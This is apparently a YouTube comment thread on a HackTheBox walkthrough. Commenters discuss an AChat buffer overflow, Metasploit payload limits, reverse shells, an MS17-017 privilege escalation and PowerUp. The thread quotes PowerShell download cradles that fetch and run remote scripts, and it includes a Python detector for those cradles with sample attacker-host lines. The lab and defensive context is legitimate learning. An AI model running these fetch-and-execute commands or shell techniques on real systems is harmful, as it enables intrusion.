As a noob who is on the long OSCP road, THIS IS THE BEST ALL-ROUND BOX of the retired machines so far. Loads of useful teachings. Thanks IPP
So much satisfaction after each of your video I watch! Thanks again ippsec
@37:00 when doing Metasploit, the encoder payload error happens when the payload cannot fit inside of the buffer requirements. A staged payload (though meterpreter_reverse_http should be) would be needed or other option (as you showed). Maybe the module is just bugged.
You can view the source of the msf modules directly to see size requirements, but I wish that msf would just give a better error when this happens.
I don't understand 24:18. How can I learn this, any source? My English is very bad. I listened 5-6 times but I don't understand, I want to read articles. OK, we have credentials, but how can we use the credentials?
I'm so glad you got the same "encoder encoded the buffer successfully" error, I had like flashbacks as that part happened and was so annoyed at it. Plus side was it forced me to not be lazy and do the fun Python exploit way.
Did you try a staged payload? It's smaller and I think it makes it more likely to succeed. The buffer overflow has a limit on how many bytes of payload it can carry and also what byte sequences are allowed in the payload. If metasploit can't generate a payload given those constraints it will give an error. You could try a staged payload or use a reverse tcp shell and then use post/multi/manage/shell_to_meterpreter. I didn't try this box but I think this was the reason for the error.
The nmap scan said port 9255/TCP and 9256/TCP. But exploit/windows/misc/achat_bof requires UDP for RPORT.
TCP uses a three-way handshake to establish a connection, UDP uses connectionless communication (no handshakes). I think that could be one cause why it isn't working? (We don't get a connection as client.)
"Achat is vulnerable to a SEH-based stack buffer overflow, caused by improper bounds checking by AChat.exe. *By sending a specially-crafted UDP packet* to the default port 9256 to overwrite the SEH handler, a remote attacker could overflow a buffer and execute arbitrary code on the system or cause the application to crash."
source: www.speedguide.net/port.php?port=9256
Maybe it shouldn't be too easy to exploit via msfconsole, so the developer(s) used TCP.
management/spawnas > this module does the same job you did, elevate privileges to administrator when we supply the credentials
After 2 years I came to watch all the videos from the beginning 👍👍👍
~2021~ still watching and learning
After 6 years I came to watch all his videos from the beginning :)
Just a confusion: "pleasesubscribe.ipp"? How does this file execute as it's running a PowerShell script... shouldn't it pop up an error?
I realise that this could be a silly question to ask, but how did you copy multiple pages of the terminal window @ 13:09 ? Keep up the good work ippsec!
ua-cam.com/video/Lqehvpe_djs/v-deo.htmlm25s
Man, I guess ippsec has REALLY explained everything he does, cheers
Great video as always.
I think this box is very good for learning BOF.
It's not my bread, I'm rather a crypto guy.
Hello
I followed your instruction and I can see the GET request in the Python HTTP server with a 200 code, but the reverse shell is not showing up.
Could you please give me some tips? Cause I am wondering that the PowerShell command you put in the msfvenom payload creation should download the file, but which cmd should execute the file?
It sounds like you have an error in the script that is being downloaded. The IEX() stands for Invoke-Expression, so it's executing whatever code it pulls down from the page. I'd suggest creating a Windows box and manually executing the ps1 script and seeing if there are any errors.
47:09 you did actually write the password wrong. Fun video tho, and interesting with some windows boxes!
More Ninja stuff, great work!!!
1:12 "I'll be relatively *IppSec*"
Awesome! Got to know many methods to rooot
Hi IppSec, I enjoyed your video and intend to run through all of them once I have mastered each box on my own. I actually found another way. Looking at installed applications using PowerShell: Invoke-WmiMethod -Namespace root\default -Class StdRegProv -Name EnumKey @(2147483650,"Software\Microsoft\Windows\CurrentVersion\Uninstall") | Select -ExpandProperty sNames I saw that the patch installed was KB4040973 = MS17-SEP5. I suspected the box to be vulnerable to MS17-017. I reworked the exploit to open a reverse shell rather than open a CMD prompt on the desktop running as Administrator (which is useless without a Remote Desktop connection). With the reverse shell I get a prompt running as nt authority\system.
MS17-017 security bulletin was dated Oct 10, 2017
Good call! I definitely don’t do the best job when looking for PrivEscs due to bad system patching
@Rob Taylor: Thanks so much for this! If I may ask, how did you manage to compile the MS17-017.cpp code after modifying it? I tried to compile the original version (taken from SecWiki's GitHub repository) with "i686-w64-mingw32-g++ MS17-017.cpp -o MS17-017", and it gave me an error about the Windows.h header. I have the cross-compiler installed, so I was quite puzzled to see the error about the Windows header.
@horizonholt8522 I used Visual Studio 2013 installed on a Windows VM to compile the exploit.
@rtaylor777 Thank you for getting back to me! :)
Thanks for this video, damn thing was always crashing.
What terminal emulator are you using? I like the split function.
He uses Tmux
ua-cam.com/video/Lqehvpe_djs/v-deo.html
The box used to crash so much... I didn't even bother trying to get in.
How does Invoke-AllChecks work? I tried it on my own machine and I didn't find it; there are other Invoke-* commands like Invoke-WebRequest, but not AllChecks!?
Just before I run Invoke-AllChecks I load the PowerUp Module into my session which contains Invoke-AllChecks. I used the IEX(New-Object Net.WebClient).downloadString('...') to load it.
IppSec so the powersploit added the func!?
Yes, I'm not a PowerShell expert but I think IEX evaluates an expression (downloaded from the HTTP server) and the expression defines the function Invoke-AllChecks. So once it's defined, he can just issue the function call to the recently defined function.
I think it has so many downvotes because the BOF on this machine sucks. It seems to only work for a few minutes after a reset, and only after many, many tries. And the ports don't always show up, did a full scan many times on different days and nothing seemed to be open, iirc I only found them after moving to a vip network.
At least it taught me to keep trying over and over when I'm expecting something to work.
Edit: and ping didn't work on the free vpn.
Edit2: and I just remembered that only one payload seemed to encode properly, and the msf exploit doesn't seem to work at all.
This box sucks big time.
When the box was released the service wouldn't restart after a crash. I know the admins did a patch to fix that by adding tasks to restart the service. That said, I believe if you used the BOF and then didn't migrate from the process, the tasks failed to restart, so it locked others out, potentially causing it so they couldn't even see the ports in an nmap scan. This box seemed unusable as free and not ideal for the HTB environment, and much more suited to a VulnHub boot2root box.
I never managed to find those fuc*ing ports not even with masscan. wtf.
1:33 Again, shouldn't that be "I've already *run* it"?
16:52 You omitted the second S in substring.
35:54 I know you typed and said the same thing here, but this is the first time I see you use a 3-digit port number.
54:21 I recognize ducky and bunny.
I appreciate your wish that people subscribe to your channel, but wouldn't a name other than pleasesubscribe give a better indication what it's for?
Been a while, not positive why I did 901 at 35:54. Was either just a mistake typing and I went with it, or did it out of fear of typing "00" (Null Byte) into a buffer overflow..
As for PleaseSubscribe - Its just a long probably overdone joke that i use for fields that truly don't matter. Sure I could name it like "AnyFilenameWillDo" but I think the target demographic of these videos doesn't need that level of detail.
Powershell should have a wget alias you can use.
This box....ippsec!
The reason the metasploit payload you initially tried didn't work is due to the fact that the default meterpreter payloads you were trying to use are too big for this specific exploit.
github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/misc/achat_bof.rb
Says that the payload size can only be 730 bytes. So you needed to use a smaller payload in order for it to encode properly :)
Also you can run powershell functions by using 'IEX(New-Object net.webclient).downloadstring("blah/blah");Invoke-Function'. This way you don't have to modify the ps1 file every time in order to execute the function.
Great video though, really making me kick myself for missing the Admin password being the same as Alfred's.
Thanks! Should have checked payload size, I had it working before the video, I think an update changed something. Anyways there was a script running every minute to restart ACHAT which killed meterpreter if you didn't auto-migrate out. Was hoping to show that but oh well, there will be another chance in the future.
I generally avoid chaining a command to IEX as it introduces a unique character after a download. So you can run into weird situations where the semicolon breaks it altogether, or it downloads the script and fails to execute. Just modifying the ps1 script makes it less likely to miss the vulnerability due to odd edge cases.
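The two forms of the IEX download cradle discussed in this thread (the bare `IEX(New-Object Net.WebClient).downloadString(...)` that loads a script such as PowerUp so its functions become defined in the session, and the chained `...;Invoke-Function` variant) are exactly the strings a defender looks for in PowerShell script block logs. The following Python is an added example, not code from the video or from anyone in this thread: it models a small classifier run over constructed sample script block text, reporting the URL fetched and whether a command was chained after the cradle. The log lines and the `192.0.2.10` host are constructed samples, not real Event ID 4104 records.

```python
"""Flag PowerShell download-cradle patterns in script block text.

Added example for this thread; not the project's or the video's own code.
Input lines below are constructed samples, not real log records.
"""
import re
from typing import Optional

# Case-insensitive pieces of the cradle: IEX or Invoke-Expression, a
# WebClient object, and a DownloadString/DownloadFile call.
CRADLE_RE = re.compile(
    r"(?:iex|invoke-expression)\s*\(?\s*.*?"
    r"new-object\s+(?:system\.)?net\.webclient.*?"
    r"\.download(?:string|file)\s*\(",
    re.IGNORECASE,
)

# A command chained after the cradle on the same line, e.g. ';Invoke-AllChecks'.
CHAINED_RE = re.compile(r"\)\s*;\s*([A-Za-z][\w-]*)")

URL_RE = re.compile(r"https?://[^\s'\"()]+", re.IGNORECASE)


def classify(script_block: str) -> Optional[dict]:
    """Return details of a download cradle in the block, or None if absent."""
    m = CRADLE_RE.search(script_block)
    if not m:
        return None
    # Only look for chaining after the cradle itself, so a ';' earlier in
    # the line is not mistaken for a chained invocation.
    chained = CHAINED_RE.search(script_block, m.end())
    url = URL_RE.search(script_block)
    return {
        "url": url.group(0) if url else None,
        # None means "script loaded, nothing executed yet" (the bare form);
        # a name means the chained form that runs a function immediately.
        "chained_command": chained.group(1) if chained else None,
    }


def scan(blocks):
    """Run classify() over many blocks and keep only the hits."""
    return [r for r in (classify(b) for b in blocks) if r is not None]


# Constructed sample script block contents (not real logs).
SAMPLE_BLOCKS = [
    "IEX(New-Object Net.WebClient).downloadString('http://192.0.2.10/PowerUp.ps1')",
    'IEX(New-Object net.webclient).downloadstring("http://192.0.2.10/PowerUp.ps1");Invoke-AllChecks',
    "Get-ChildItem C:\\Users | Select-Object Name",
    "Invoke-Expression (New-Object System.Net.WebClient).DownloadString('http://192.0.2.10/run.ps1')",
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_BLOCKS):
        print(hit)
```

Run as-is it prints three hits: the two bare cradles with `chained_command` set to `None`, and the `;Invoke-AllChecks` variant with the chained name filled in. Matching on the cradle pieces rather than on one exact string is deliberate, since the casing of `Net.WebClient` and `downloadString` varies from line to line in this very thread.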
That's fair, and yeah I hated that auto-restart script. I couldn't get the automigrate working in meterpreter and eventually just spawned into an Empire listener and migrated using that.
You are amazing
Lol you deleted the entire buffer overflow
I think people would have had a better time with this box if they used a standard reverse shell instead of a meterpreter reverse shell. I personally had no issues with the service crashing/sessions dying while using just a plain shell, even when I tested the exploit locally. I personally feel like this box got a lot of hate for no reason.
I thought this box was easy.. You lost me.. With the whole webserver setup.
I hate this box SO MUCH!!!
lol